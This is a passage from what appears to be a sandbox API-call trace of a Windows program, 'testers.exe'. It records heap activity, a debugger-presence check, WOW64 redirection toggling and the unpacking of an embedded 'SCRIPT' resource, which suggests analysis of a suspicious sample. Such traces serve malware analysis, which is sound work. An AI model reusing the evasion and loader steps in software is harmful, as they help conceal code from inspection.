lpSystemTimeAsFileTime=0x87f0e8*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.322] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fae3, cb=0x1, pcbRead=0x87f434 | out: pv=0x87fae3*=0x0, pcbRead=0x87f434*=0x1) returned 0x0 [0251.322] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fadc, cb=0x4, pcbRead=0x87f434 | out: pv=0x87fadc*=0xbc, pcbRead=0x87f434*=0x4) returned 0x0 [0251.322] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fadc, cb=0x4, pcbRead=0x87f434 | out: pv=0x87fadc*=0xbc, pcbRead=0x87f434*=0x4) returned 0x0 [0251.322] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x87fadc, cb=0x4, pcbRead=0x87f434 | out: pv=0x87fadc*=0x84, pcbRead=0x87f434*=0x4) returned 0x0 [0251.322] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.322] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xc853f0 [0251.322] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xc85400 [0251.322] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0xc85400, cb=0x0, pcbRead=0x87f434 | out: pv=0xc85400*=0x6e, pcbRead=0x87f434*=0x0) returned 0x0 [0251.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f330 | out: lpSystemTimeAsFileTime=0x87f330*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.322] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853f0 | out: hHeap=0xc60000) returned 1 [0251.322] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85400 | out: hHeap=0xc60000) returned 1 [0251.322] CloseHandle (hObject=0xf8) returned 1 [0251.322] IUnknown:Release (This=0xc86430) returned 0x0 [0251.323] FreeLibrary (hLibModule=0x290000) returned 1 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc722d0 | out: hHeap=0xc60000) returned 1 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a680 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86430 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86458 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85400 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73348 | out: hHeap=0xc60000) returned 1 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864a8 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85870 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86430 | out: hHeap=0xc60000) returned 1 [0251.323] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a6f0 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a708 [0251.323] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853f0 [0251.323] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86430 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a720 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85410 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a738 [0251.324] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0251.324] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a6f0 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85420 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xc8aad8 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85430 [0251.324] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a750 [0251.324] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0251.324] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0251.324] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0251.324] IsDebuggerPresent () returned 0 [0251.324] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85faf8, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0251.324] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x85faf8, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0251.325] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x60) returned 0xc8acf8 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0251.325] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85fac8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0251.325] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x60) returned 0xc8ad60 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864d0 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864f8 [0251.325] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85440 [0251.325] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0251.326] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0251.326] Wow64DisableWow64FsRedirection (in: OldValue=0x86fa64 | out: OldValue=0x86fa64*=0x0) returned 1 [0251.326] FreeLibrary (hLibModule=0x75990000) returned 1 [0251.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x86f900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0251.326] GetFileType (hFile=0xf8) returned 0x1 [0251.326] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0251.327] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0251.328] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0251.328] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0251.328] FreeLibrary (hLibModule=0x75990000) returned 1 [0251.328] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xc8adc8 [0251.328] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0251.328] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x86fa94 | out: ppstm=0x86fa94*=0xc86520) returned 0x0 [0251.328] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0251.328] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0251.328] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0251.328] LockResource (hResData=0x3607b8) returned 0x3607b8 [0251.328] ISequentialStream:RemoteWrite (in: This=0xc86520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0251.328] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.328] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.328] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0xc8adc8, cb=0x18, pcbRead=0x86f9ec | out: pv=0xc8adc8*=0xa3, pcbRead=0x86f9ec*=0x18) returned 0x0 [0251.328] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.328] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa30, cb=0x4, pcbRead=0x86f9ec | out: pv=0x86fa30*=0x45, pcbRead=0x86f9ec*=0x4) returned 0x0 [0251.328] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85450 | out: hHeap=0xc60000) returned 1 [0251.329] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8adc8 | out: hHeap=0xc60000) returned 1 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa54, cb=0x10, pcbRead=0x86fa2c | out: pv=0x86fa54*=0x4d, pcbRead=0x86fa2c*=0x10) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f928 | out: lpSystemTimeAsFileTime=0x86f928*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.329] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.329] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3a8, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3a8*=0x6b, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3b0, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3b0*=0xa6, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f198, cb=0x34, pcbRead=0x86f16c | out: pv=0x86f198*=0xe1, pcbRead=0x86f16c*=0x34) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3b0, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3b0*=0x17, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3dc, cb=0x6e, pcbRead=0x86f16c | out: pv=0x86f3dc*=0xf9, pcbRead=0x86f16c*=0x6e) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.329] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3a0, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3a0*=0xbc, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3a8, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3a8*=0x6b, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3b0, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3b0*=0xaf, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.329] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f198, cb=0x26, pcbRead=0x86f16c | out: pv=0x86f198*=0xe6, pcbRead=0x86f16c*=0x26) returned 0x0 [0251.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3b0, cb=0x4, pcbRead=0x86f16c | out: pv=0x86f3b0*=0x1b, pcbRead=0x86f16c*=0x4) returned 0x0 [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86f3dc, cb=0x76, pcbRead=0x86f16c | out: pv=0x86f3dc*=0x6b, pcbRead=0x86f16c*=0x76) returned 0x0 [0251.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f068 | out: lpSystemTimeAsFileTime=0x86f068*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa63, cb=0x1, pcbRead=0x86f3b4 | out: pv=0x86fa63*=0x1, pcbRead=0x86f3b4*=0x1) returned 0x0 [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa5c, cb=0x4, pcbRead=0x86f3b4 | out: pv=0x86fa5c*=0x86, pcbRead=0x86f3b4*=0x4) returned 0x0 [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa5c, cb=0x4, pcbRead=0x86f3b4 | out: pv=0x86fa5c*=0xe4, pcbRead=0x86f3b4*=0x4) returned 0x0 [0251.330] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x86fa5c, cb=0x4, pcbRead=0x86f3b4 | out: pv=0x86fa5c*=0x48, pcbRead=0x86f3b4*=0x4) returned 0x0 [0251.330] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0251.330] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x27c58) returned 0xca41e0 [0251.331] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x923a) returned 0xc8adc8 [0251.331] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0xc8adc8, cb=0x923a, pcbRead=0x86f3b4 | out: pv=0xc8adc8*=0x6d, pcbRead=0x86f3b4*=0x923a) returned 0x0 [0251.331] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2b0 | out: lpSystemTimeAsFileTime=0x86f2b0*(dwLowDateTime=0x37564710, dwHighDateTime=0x1d661be)) [0251.333] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20000) returned 0xccbe40 [0251.333] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xcebe48 [0251.334] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xcfbe50 [0251.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xccbe40 | out: hHeap=0xc60000) returned 1 [0251.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcebe48 | out: hHeap=0xc60000) returned 1 [0251.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcfbe50 | out: hHeap=0xc60000) returned 1 [0251.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8adc8 | out: hHeap=0xc60000) returned 1 [0251.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x82e4) returned 0xc8adc8 [0251.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xc86570 [0251.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86570 | out: hHeap=0xc60000) returned 1 [0251.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86570 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a6f0 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86598 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a768 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc8a6f0 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a780 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85450 | out: hHeap=0xc60000) returned 1 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a6f0 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1e) returned 0xc865c0 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a780 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc865e8 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc865c0 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a798 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7b0 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a780 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7c8 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7e0 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7f8 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85460 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7c8 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7c8 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a810 [0251.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7e0 | out: hHeap=0xc60000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7e0 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a828 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a840 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a858 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85470 [0251.342] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a828 | out: hHeap=0xc60000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a828 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a870 [0251.342] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a840 | out: hHeap=0xc60000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a840 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85480 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a888 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8a0 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930d0 [0251.342] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85480 | out: hHeap=0xc60000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a8b8 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8d0 [0251.342] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a888 | out: hHeap=0xc60000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc722d0 [0251.342] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86570 | out: hHeap=0xc60000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a888 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x12) returned 0xc8a628 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8e8 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86570 [0251.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85480 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a900 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a918 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8e8 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a8e8 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc8a930 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a948 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930e0 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a948 | out: hHeap=0xc60000) returned 1 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc930e0 | out: hHeap=0xc60000) returned 1 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a930 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a930 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a948 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc8a960 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a978 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a990 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930e0 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a960 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a960 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a9a8 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a978 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a978 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9c0 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xc934b8 [0251.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc722d0 | out: hHeap=0xc60000) returned 1 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9d8 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9f0 [0251.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa08 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa20 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930f0 [0251.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9f0 | out: hHeap=0xc60000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9f0 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa38 [0251.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa08 | out: hHeap=0xc60000) returned 1 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa08 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa50 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa68 [0251.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc8aa80 [0251.344] RtlAllocateHeap 